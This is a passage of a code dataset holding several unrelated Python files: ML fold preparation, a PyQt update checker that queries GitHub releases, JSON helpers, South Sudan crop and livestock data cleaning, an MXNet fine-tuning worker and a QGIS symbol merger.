res.append(fl)\n        #print fl\n    return res\n\n\ndef main():\n    train_fol, test_fol = prepare_folders()\n    dtl = DeviceTagsLoader(oracle_fn)\n    oracle = dtl.devs\n\n    folds = make_folds(oracle)\n    #for e in folds:\n    #    print e\n\n    file_names = get_files_names()\n\n    for i in xrange(5):\n        train, test = make_oracles(oracle, folds[i][0], folds[i][1])\n        copy_files_per_oracle(train, file_names, OUT_MAIN + str(i) + '_fold/' + train_fol)\n        file_names = map_samples_to_all(file_names)\n        copy_files_per_oracle(test, file_names, OUT_MAIN + str(i) + '_fold/' + test_fol)\n\n\nif '__main__' == __name__:\n    main()\n","sub_path":"features2folders/make_folds_w_all.py","file_name":"make_folds_w_all.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"50096124","text":"__author__ = 'tholen'\n\nfrom UserCode.RWTH3b.cmsRunController.tools.TemplateFitTool import \\\n    CRHistoWorker,\\\n    CRTemplateFitTool,\\\n    CRTemplateFitWorker\nfrom UserCode.RWTH3b.cmsRunController.classes.CRRootStyle import CRRootStyle\nroot_style = CRRootStyle()\n\n####\n#### Another time!\n####\nclass CREnsembleStudyWorker(CRHistoWorker):\n    \"\"\"\n    \"\"\"\n\n    def configure(self):\n        \"\"\"\n        \"\"\"\n\n        self.iterations = self.worker_request.iterations\n\n\n    def run_procedure(self):\n        \"\"\"\n        \"\"\"\n\n        fitter = CRTemplateFitWorker()\n        fitter.lumi = self.lumi\n\n\n\n\nclass CREnsembleStudyTool(CRTemplateFitTool):\n    \"\"\"\n    \"\"\"\n\n    def configure(self):\n        self.after_every_process = False\n        self.fit_worker_class = CREnsembleStudyWorker\n        self.add_tokens_to_request = [\n            \"iterations\"\n        ]\n","sub_path":"python/cmsRunController/tools/EnsembleStudyTool.py","file_name":"EnsembleStudyTool.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"510561129","text":"\"\"\"Module responsible for checking the latest software version\nin the GitHub repository and, when necessary, launching the automatic\nupdate\"\"\"\nimport json\nimport urllib.request\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMessageBox, QApplication\n\n\nclass MessageBox(QMessageBox):\n\n    def __init__(self, wersja):\n        super().__init__()\n        acceptbtn = self.addButton('Tak', self.AcceptRole)\n        acceptbtn = self.standardButton(acceptbtn)\n        nobtn = self.addButton('Nie', self.RejectRole)\n        nobtn = self.standardButton(nobtn)\n        self.setWindowIcon(QIcon('icons/cow.png'))\n        self.setWindowTitle('Aktualizacja PBPZ')\n        self.setIcon(QMessageBox.Information)\n        self.setText('Pojawiła się nowa aktualizacja programu PBPZ ({}).\\nCzy chcesz ja teraz pobrać?'.format(wersja))\n        self.setStandardButtons(acceptbtn | nobtn)\n        self.show()\n\n\ndef getResponse(url):\n    operUrl = urllib.request.urlopen(url)\n    if operUrl.getcode() == 200:\n        data = operUrl.read()\n        jsonData = json.loads(data)\n    else:\n        print(\"Error receiving data\", operUrl.getcode())\n    return jsonData\n\n\ndef showDialog(wersja=None):\n    print(wersja)\n    import sys\n    app = QApplication(sys.argv)\n    from PyQt5.QtWidgets import QStyleFactory\n    app.setStyle(QStyleFactory.create('Fusion'))\n    message = MessageBox(wersja)\n    if message.exec() != QMessageBox.Accepted:\n        print('Wybrano tak')\n        import webbrowser\n        webbrowser.open('https://github.com/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest')\n        sys.exit(0)\n    else:\n        print('Wybrano nie')\n\n\n# https://api.github.com/repos/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest\nif __name__ 
== \"__main__\":\n jsonData = getResponse('https://api.github.com/repos/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest')\n print(jsonData['tag_name'][1:])\n","sub_path":"autoupdate.py","file_name":"autoupdate.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"606060248","text":"import json as jn\nfrom pathlib import Path\nfrom typing import Union\n\nfrom myutils import get_path\n\n__all__ = [\n 'load_json',\n 'save_json',\n 'load_json_or_create',\n]\n\n\ndef load_json(fpath: Union[Path, str], encoding: str = 'utf-8') -> Union[dict, list, str]:\n \"\"\"Load a json file.\n\n :param fpath: str or Path\n :param encoding: str\n :return: json file contents\n \"\"\"\n\n fpath = get_path(fpath)\n\n with fpath.open(encoding=encoding) as file:\n return jn.load(file)\n\n\ndef save_json(obj: Union[dict, list, str], fpath: Union[Path, str], encoding: str = 'utf-8') -> None:\n \"\"\"Save an object to a json file.\n\n :param obj: dict or list or str\n :param fpath: str or Path\n :param encoding: str\n \"\"\"\n\n fpath = get_path(fpath)\n\n with fpath.open('w', encoding=encoding) as file:\n jn.dump(obj, file, ensure_ascii=False, indent=4)\n\n\ndef load_json_or_create(\n fpath: Union[Path, str],\n factory: type,\n encoding: str = 'utf-8',\n) -> Union[dict, list, str]:\n \"\"\"Load json, if file exists, otherwise create an object\n from the given factory.\n\n :param fpath: file path\n :param factory: default data type\n :param encoding: encoding\n :return: json file contents\n \"\"\"\n\n fpath = Path(fpath)\n\n if fpath.exists():\n return load_json(fpath, encoding)\n\n else:\n return factory()\n","sub_path":"myutils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"223335160","text":"\"\"\" Script for cleaning data for 12 month evaluation. 
\"\"\"\n\nimport sys\nimport re\nimport pandas as pd\nfrom glob import glob\nfrom typing import List\nfrom delphi.utils import cd\nfrom delphi.paths import data_dir\n\n\n\n\n\n\n\ndef process_climis_crop_production_data(data_dir: str):\n \"\"\" Process CliMIS crop production data \"\"\"\n\n climis_crop_production_csvs = glob(\n \"/\".join(\n [\n data_dir,\n \"Climis South Sudan Crop Production Data\",\n \"Crops_EstimatedProductionConsumptionBalance*.csv\",\n ]\n )\n )\n state_county_df = pd.read_csv(\n \"/\".join([data_dir, \"ipc_data.csv\"]), skipinitialspace=True\n )\n\n combined_records = []\n\n for f in climis_crop_production_csvs:\n year = int(f.split(\"/\")[-1].split(\"_\")[2].split(\".\")[0])\n df = pd.read_csv(f).dropna()\n for i, r in df.iterrows():\n record = {\n \"Year\": year,\n \"Month\": None,\n \"Source\": \"CliMIS\",\n \"Country\": \"South Sudan\",\n }\n region = r[\"State/County\"].strip()\n\n if region in state_county_df[\"State\"].values:\n record[\"State\"] = region\n record[\"County\"] = None\n else:\n potential_states = state_county_df.loc[\n state_county_df[\"County\"] == region\n ][\"State\"]\n if len(potential_states) != 0:\n record[\"State\"] = potential_states.iloc[0]\n else:\n record[\"State\"] = None\n record[\"County\"] = region\n\n\n for field in r.index:\n if field != \"State/County\":\n if \"Net Cereal production\" in field:\n record[\"Variable\"] = \"Net Cereal Production\"\n record[\"Value\"] = r[field]\n if field.split()[-1].startswith(\"(\"):\n record[\"Unit\"] = field.split()[-1][1:-1].lower()\n else:\n record[\"Unit\"] = None\n\n combined_records.append(record)\n\n df = pd.DataFrame(combined_records)\n return df\n\n\ndef process_fao_livestock_data(\n data_dir: str, columns: List[str]\n ) -> pd.DataFrame:\n csvfile = \"/\".join(\n [\n \"FAO Crop_Livestock Production Data\",\n \"FAOSTAT_South_Sudan_livestock_data_2014-2016.csv\",\n ]\n )\n\n fao_livestock_csv = \"/\".join([data_dir, csvfile])\n\n df = pd.read_csv(\n fao_livestock_csv, usecols=[\"Element\", \"Item\", \"Year\", \"Unit\", \"Value\"]\n )\n\n df[\"Animal\"] = df[\"Item\"].str.split(\",\").str.get(-1)\n df[\"Product\"] = df[\"Item\"].str.split(\",\").str.get(0)\n df[\"Variable\"] = df[\"Animal\"] + \" \" + df[\"Product\"] + \" \" + df[\"Element\"]\n df[\"Variable\"] = df[\"Variable\"].str.lower()\n df[\"Unit\"] = df[\"Unit\"].str.lower()\n df[\"Source\"] = \"FAO\"\n df[\"State\"] = None\n df[\"County\"] = None\n df[\"Country\"] = \"South Sudan\"\n df[\"Month\"] = None\n fao_livestock_df = df[columns]\n return fao_livestock_df\n\n\ndef process_fewsnet_data(data_dir, columns: List[str]) -> pd.DataFrame:\n \"\"\" Process IPC food security classifications by county for South Sudan. \"\"\"\n df = pd.read_csv(\"/\".join([data_dir, \"ipc_data.csv\"]))\n df[\"Unit\"] = \"IPC Phase\"\n df[\"Source\"] = \"FEWSNET\"\n df[\"Variable\"] = \"IPC Phase Classification\"\n df[\"Country\"] = \"South Sudan\"\n df.rename(str.strip, axis=\"columns\", inplace=True)\n df.rename(columns={\"IPC Phase\": \"Value\"}, inplace=True)\n df = df[columns]\n return df\n\n\ndef process_climis_livestock_data(data_dir: str):\n \"\"\" Process CliMIS livestock data. 
\"\"\"\n\n records = []\n climis_livestock_production_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Production\"])\n\n with cd(climis_livestock_production_dir):\n # dirs = glob(\"*\")\n # for dir in dirs:\n # with cd(dir):\n # print(\"climis_livestock_dir:\" + climis_livestock_dir)\n for filename in glob('*2017.csv'):\n # print('filename:' + filename)\n df = pd.read_csv(filename, index_col=0)\n # print(df.index)\n for column in df.columns:\n # print(column)\n record = {\n 'Year': 2017,\n 'Variable': \"Percentage of householding at least milking one of their livestocks\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc['Households '][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[1]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n \n climis_livestock_bodycondition_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Body Condition\"])\n with cd(climis_livestock_bodycondition_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i in df.index:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc[i][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Percentage of \" + filename.split('_')[-3] + \" in body condiction of \" + i\n records.append(record)\n\n\n climis_livestock_diseases_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Diseases\"])\n with cd(climis_livestock_diseases_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n # print(df.loc['FMD'])\n # print()\n # df.rename(str.strip, axis=\"columns\", inplace=True)\n for i, r in df.iterrows():\n # print (i)\n if(i != 'Reported ' and i != 'Vaccinated ' and i != 'Treated '):\n disease_str = i\n else:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Percentage of livestocks with disease \" + disease_str + \" is \" + i\n records.append(record)\n\n\n climis_livestock_ownership_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Ownership\"])\n with cd(climis_livestock_ownership_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i, r in df.iterrows():\n if(i != 'Cattle' and i != 'Goat' and i != 'Sheep' and i != 'Poultry'):\n quantity_str = i\n else:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = quantity_str.replace('animal', i).replace('stock', i)\n if(quantity_str == 'Average price of animal sold (SSP)'):\n record[\"Unit\"] = '$'\n else:\n record[\"Unit\"] = None\n\n records.append(record)\n\n\n climis_livestock_loss_dir = 
\"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Loss\"])\n with cd(climis_livestock_loss_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i in df.index:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc[i][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Percentage of \" + filename.split('_')[-3] + \" suffer from \" + i\n records.append(record)\n\n climis_livestock_MarketPrices_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Market Prices\"])\n with cd(climis_livestock_MarketPrices_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i, r in df.iterrows():\n for column in df.columns:\n if(column!= 'Market'):\n record = {\n 'Year': 2017,\n 'Country': \"South Sudan\",\n 'Unit': '$',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['County'] = i\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Price of \" + filename.split('_')[-3] + \" in Market \" + r['Market']\n records.append(record)\n\n climis_livestock_migration_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Migration\"])\n with cd(climis_livestock_migration_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n row_id = 0\n for i, r in df.iterrows():\n \n if(row_id == df.index.get_loc(\"Distance covered\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Livestock migration distance covered\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': 'mile',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\"Proportion of livestock that migrated\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Migration normal at this time of the year\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated normally at this time of the year\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Migration normal at this time of the year\") + 2):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated abnormally at this time of the year\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n 
}\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Duration in months when the migrated animals are expected to be back after \") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Duration in months when the migrated animals are expected to be back after\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': \"month\",\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(i == 'Migration In ' or i == 'Migration Out' or i == 'No Migration'):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Livestocks Percentage of \" + i\n records.append(record)\n \n\n if(i == 'Pasture' or i == 'Water' or i == 'Conflict / Insecurity' or i == 'Disease' or i == 'Wild Conflict' or i == 'Others'):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Percentage of livestock migration due to \" + i\n records.append(record)\n\n row_id += 1\n\n\n climis_livestock_data_df = pd.DataFrame(records)\n # print(climis_livestock_data_df)\n return climis_livestock_data_df\n\ndef create_combined_table(data_dir: str, columns: List[str]) -> pd.DataFrame:\n climis_crop_production_df = process_climis_crop_production_data(data_dir)\n fao_livestock_df = process_fao_livestock_data(data_dir, columns)\n ipc_df = process_fewsnet_data(data_dir, columns)\n climis_livestock_data_df = process_climis_livestock_data(data_dir)\n\n df = pd.concat(\n [climis_crop_production_df, fao_livestock_df, ipc_df, climis_livestock_data_df], sort=True\n )\n\n return df[columns]\n\n\nif __name__ == \"__main__\":\n columns = [\n \"Variable\",\n \"Year\",\n \"Value\",\n \"Unit\",\n \"Source\",\n \"State\",\n \"County\",\n \"Country\",\n ]\n\n data_dir = str(data_dir / \"evaluations\" / \"12_month\")\n combined_table = create_combined_table(data_dir, columns)\n combined_table.to_csv(\"combined_table.csv\", sep=\"|\", index=False)\n","sub_path":"scripts/evaluations/12_month_evaluation.py","file_name":"12_month_evaluation.py","file_ext":"py","file_size_in_byte":18255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220106029","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport sys\nimport traceback\nimport signal\nimport mxnet as mx\n\nfrom ava.params import params\nfrom ava.log.logger import logger\nfrom ava.monitor import mxnet as mxnet_monitor\nfrom ava.train import base as train\nfrom ava.utils.model import mxnet as model_utils\nfrom ava.utils import utils\n\nFIT_KWARGS_KEYS = (\"eval_metric\", \"epoch_end_callback\", \"batch_end_callback\",\n \"kvstore\", \"optimizer\", \"optimizer_params\", \"num_epoch\",\n \"monitor\")\nCROP_CHANNELS = 3\n\n\nclass 
MXNetTrainingWorker(object):\n\n def __init__(self):\n self.train_ins = None\n self.train_config = {}\n self.solver_config = {}\n self.train_data = None\n self.val_data = None\n self.mod = None\n\n def prepare_train_config(self):\n \"\"\"配置训练参数\"\"\"\n\n # AVA-SDK 获取训练参数\n \"\"\"\n 1) 获取所有配置 example\n param_dict = params.get_all()\n value1 = param_dict[\"key1\"]\n 2) 获取某项value\n value1 = params.get_value(\"key1\", default=1)\n \"\"\"\n snapshot_interval_epochs = params.get_value(\n \"snapshot_interval_epochs\", default=1)\n max_epochs = params.get_value(\"max_epochs\", default=3)\n rand_crop = params.get_value(\n \"rand_crop\", default=True)\n rand_mirror = params.get_value(\n \"rand_mirror\", default=True)\n batch_size, actual_batch_size, val_batch_size = utils.get_batch_size()\n\n batch_size = params.get_value(\"batchSize\", default=8)\n val_batch_size = params.get_value(\"valBatchSize\", default=batch_size)\n use_gpu, cores = utils.get_cores()\n logger.info(\"Cores GPU=%s, count=%d\", use_gpu, cores)\n actual_batch_size = batch_size if not use_gpu else batch_size * cores\n if use_gpu:\n val_batch_size *= cores\n\n # USING the trainning batch size as valadition batch size\n val_batch_size = actual_batch_size\n # crop_w, crop_h = utils.get_crop_size()\n # 根据模型的输入要求选择 crop_size\n crop_w = params.get_value(\"crop_w\")\n crop_h = params.get_value(\"crop_h\")\n\n # 添加监控\n snapshot_prefix = self.train_ins.get_snapshot_base_path() + \"/snapshot\"\n kv_store = \"device\"\n kv = mx.kvstore.create(kv_store)\n '''\n rank = int(kv.rank)\n if rank > 0:\n snapshot_prefix += \"-%s\" % rank\n '''\n\n batch_freq = 10 # 打印/上报指标的 batch 粒度\n batch_of_epoch = utils.ceil_by_level(\n float(utils.get_sampleset_num() / actual_batch_size))\n\n # AVA-SDK mxnet monitor callback 初始化\n batch_end_cb = self.train_ins.get_monitor_callback(\n \"mxnet\",\n batch_size=actual_batch_size,\n batch_freq=batch_freq)\n epoch_end_cb = [\n # mxnet default epoch callback\n mx.callback.do_checkpoint(\n snapshot_prefix, snapshot_interval_epochs),\n self.train_ins.get_epoch_end_callback(\n \"mxnet\", batch_of_epoch=batch_of_epoch, epoch_interval=snapshot_interval_epochs, other_files=[])\n ]\n\n # 训练参数,用户可以自行配置\n self.train_config = {\n \"input_data_shape\": (CROP_CHANNELS, crop_h, crop_w),\n \"rand_crop\": rand_crop,\n \"rand_mirror\": rand_mirror,\n \"batch_size\": batch_size,\n \"actual_batch_size\": actual_batch_size,\n \"val_batch_size\": val_batch_size,\n # fit_args\n \"eval_metric\": mxnet_monitor.full_mxnet_metrics(), # AVA-SDK 获取mxnet metric 列表\n \"epoch_end_callback\": epoch_end_cb,\n \"batch_end_callback\": batch_end_cb,\n \"kvstore\": kv,\n \"num_epoch\": max_epochs,\n }\n\n def prepare_solver_config(self):\n use_gpu, cores = utils.get_cores()\n gpu_counts = cores if use_gpu else 0\n batch_size, actual_batch_size, val_batch_size = utils.get_batch_size()\n\n optimizer_params = {\n \"momentum\": params.get_value(\"momentum\", default=0.9),\n \"wd\": params.get_value(\"wd\", default=0.0005),\n \"learning_rate\": params.get_value(\"learning_rate\", default=0.01),\n \"lr_scheduler\": mx.lr_scheduler.FactorScheduler(2000, factor=0.0001),\n }\n self.solver_config = {\n \"gpu_counts\": gpu_counts,\n # fit_args\n \"optimizer\": \"SGD\",\n \"optimizer_params\": optimizer_params,\n }\n\n def prepare_sampleset_data(self):\n \"\"\"load sampleset data\n \"\"\"\n\n # ava sdk 提供默认的数据集路径,如果用户需要读取其他地方的数据集,可自行配置路径\n train_data_path = self.train_ins.get_trainset_base_path() + \"/cache/data.rec\"\n self.train_data = mx.io.ImageRecordIter(\n 
path_imgrec=train_data_path,\n            batch_size=self.train_config.get(\"actual_batch_size\"),\n            data_shape=self.train_config.get(\"input_data_shape\"),\n            shuffle=True,\n            rand_crop=self.train_config.get(\"rand_crop\"),\n            rand_mirror=self.train_config.get(\"rand_mirror\"))\n\n        val_data_path = self.train_ins.get_valset_base_path() + \"/cache/data.rec\"\n        if os.path.exists(val_data_path):\n            self.val_data = mx.io.ImageRecordIter(\n                path_imgrec=val_data_path,\n                batch_size=self.train_config.get(\"val_batch_size\"),\n                data_shape=self.train_config.get(\"input_data_shape\"))\n        else:\n            self.val_data = None\n\n    def prepare_model(self):\n        \"\"\"Load the network model (and update its output layer)\n        \"\"\"\n        # For scenarios where the number of classes in the model output layer must be updated;\n        # the user chooses the model file paths. This step is optional -- the user can also\n        # load the model directly through the training framework.\n        # Replace with the model and parameter file names you need. Riheng 2018/02/23\n        origin_model_path = self.train_ins.get_model_base_path() + \"/resnet-50-symbol.json\"\n        weight_file_path = self.train_ins.get_model_base_path() + \"/resnet-50-0000.params\"\n        fixed_model_path = self.train_ins.get_model_base_path() + \"/fixed_resnet-50-symbol.json\"\n\n        # AVA-SDK: get the number of classes in the sample set && update the model output layer\n        output_layer_num = utils.get_sampleset_class_num()\n        old_output_layer_name = model_utils.update_model_output_num(\n            origin_model_path, fixed_model_path, output_layer_num)\n\n        sym = mx.symbol.load(fixed_model_path)\n        gpu_count = self.solver_config.get('gpu_counts', 0)\n        ctx = [mx.cpu()] if gpu_count == 0 else [\n            mx.gpu(i) for i in range(gpu_count)\n        ]\n        mod = mx.mod.Module(symbol=sym, context=ctx)\n\n        mod.bind(data_shapes=self.train_data.provide_data,\n                 label_shapes=self.train_data.provide_label)\n\n        # Default weight initialization\n        mod.init_params(initializer=mx.init.Xavier(rnd_type='gaussian',\n                                                   factor_type=\"in\",\n                                                   magnitude=2))\n        # AVA-SDK: load weight parameters when the network output layer has been replaced\n        arg_params, aux_params = model_utils.load_model_params(\n            weight_file_path, old_output_layer_name)\n        if arg_params:\n            logger.info(\"set pretrained weights\")\n            mod.set_params(arg_params, aux_params, allow_missing=True)\n\n        self.mod = mod\n\n    def get_fine_tune_model(self, symbol, arg_params, num_hidden, layer_name='flatten0'):\n        \"\"\"\n        symbol: the pretrained network symbol\n        arg_params: the argument parameters of the pretrained model\n        num_hidden: number of hidden nodes of the output.\n        layer_name: the layer name before the last fully-connected layer\n        \"\"\"\n        all_layers = symbol.get_internals()\n        net = all_layers[layer_name+'_output']\n        net = mx.symbol.FullyConnected(data=net, num_hidden=num_hidden, name='fc1')\n        net = mx.symbol.SoftmaxOutput(data=net, name='softmax')\n        new_args = dict({k:arg_params[k] for k in arg_params if 'fc1' not in k})\n        return (net, new_args)\n\n    def prepare_model_riheng(self):\n        '''Load the network model (and update its output layer)\n        '''\n        sym, arg_params, aux_params = mx.model.load_checkpoint('/workspace/model/resnet-50', 0)\n        num_hidden = 10\n        (new_sym, new_args) = self.get_fine_tune_model(sym, arg_params, num_hidden)\n\n        # get information of ctx\n        gpu_count = self.solver_config.get('gpu_counts', 0)\n        ctx = [mx.cpu()] if gpu_count == 0 else [\n            mx.gpu(i) for i in range(gpu_count)\n        ]\n\n        mod = mx.mod.Module(symbol=new_sym, context=ctx)\n        mod.bind(data_shapes=self.train_data.provide_data,\n                 label_shapes=self.train_data.provide_label)\n\n        logger.info(\"set pretrained weights\")\n        mod.set_params(new_args, aux_params, allow_missing=True)\n        self.mod = mod\n\n    def start_new_training(self):\n        try:\n            # Bind signals; receiving one means the user chose to exit the training\n            # instance, so the instance status is a normal exit.\n            SUPPORTED_SIGNALS = (signal.SIGINT, signal.SIGTERM,)\n            for signum in SUPPORTED_SIGNALS:\n                try:\n                    signal.signal(signum, self.signal_handler)\n                    logger.info(\"Bind 
signal '%s' success to %s\",\n signum, self.signal_handler)\n except Exception as identifier:\n logger.warning(\n \"Bind signal '%s' failed, err: %s\", signum, identifier)\n\n # AVA-SDK 初始化一个训练实例\n self.train_ins = train.TrainInstance()\n\n logger.info(\"start new tarining, training_ins_id: %s\",\n self.train_ins.get_training_ins_id())\n\n logger.info(\"prepare_train_config\")\n self.prepare_train_config()\n logger.info(\"prepare_solver_config\")\n self.prepare_solver_config()\n logger.info(\"prepare_sampleset_config\")\n self.prepare_sampleset_data()\n logger.info(\"prepare_model\")\n #self.prepare_model()\n self.prepare_model_riheng()\n\n opts = self.train_config\n opts.update(self.solver_config)\n fit_args = {k: opts.get(k) for k in FIT_KWARGS_KEYS}\n logger.info(\"fit args: %s\" % fit_args)\n self.mod.fit(self.train_data,\n eval_data=self.val_data,\n initializer=mx.init.Xavier(rnd_type='gaussian', factor_type=\"in\", magnitude=2),\n **fit_args)\n\n logger.info(\"training finish\")\n err_msg = \"\"\n except Exception as err:\n err_msg = \"training failed, err: %s\" % (err)\n logger.info(err_msg)\n traceback.print_exc(file=sys.stderr)\n\n self.clean_up(err_msg=err_msg)\n\n def clean_up(self, err_msg=\"\"):\n # AVA-SDK 实例结束,需要调用 done,完成状态上报以及清理工作\n if self.train_ins == None:\n return\n self.train_ins.done(err_msg=err_msg)\n\n def signal_handler(self, signum, stack):\n logger.info(\"received signal: %s, do clean_up\", signum)\n self.clean_up()\n sys.exit()\n\nif __name__ == \"__main__\":\n worker = MXNetTrainingWorker()\n worker.start_new_training()\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":11586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198297181","text":"#!/env/python\n#\n# merge-symbols: merge geologic symbols into a single library. 
\n#\n# (c) 2019 Alessandro Frigeri, Istituto di Astrofisica e Planetologia Spaziali - INAF - Rome\n#\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element, SubElement, Comment, ElementTree\nimport os,sys\nfrom xml.dom import minidom\nimport glob\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n j = \"\\n\" + (level-1)*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for subelem in elem:\n indent(subelem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = j\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = j\n return elem\n\n\nsrcdir = sys.argv[1]\ndst = sys.argv[2] \n\ntop = ET.Element('qgis_style', version=\"1\")\ncomment = ET.Comment('geologic symbols for QGis')\ntop.append(comment)\n\nsymbols = ET.SubElement(top, 'symbols')\n\nfor rootdir, dirs, files in os.walk( srcdir ): \n for filename in files:\n if filename.endswith(\".xml\"): \n xmlfile = os.path.join(rootdir, filename)\n auth = os.path.dirname( xmlfile ).split('/')[-1]\n tree = ET.parse( xmlfile )\n root = tree.getroot()\n for symbol in root.findall(\"./symbols/symbol\"): \n symbol.attrib['tags'] = auth+',geology'\n symbols.append(symbol) 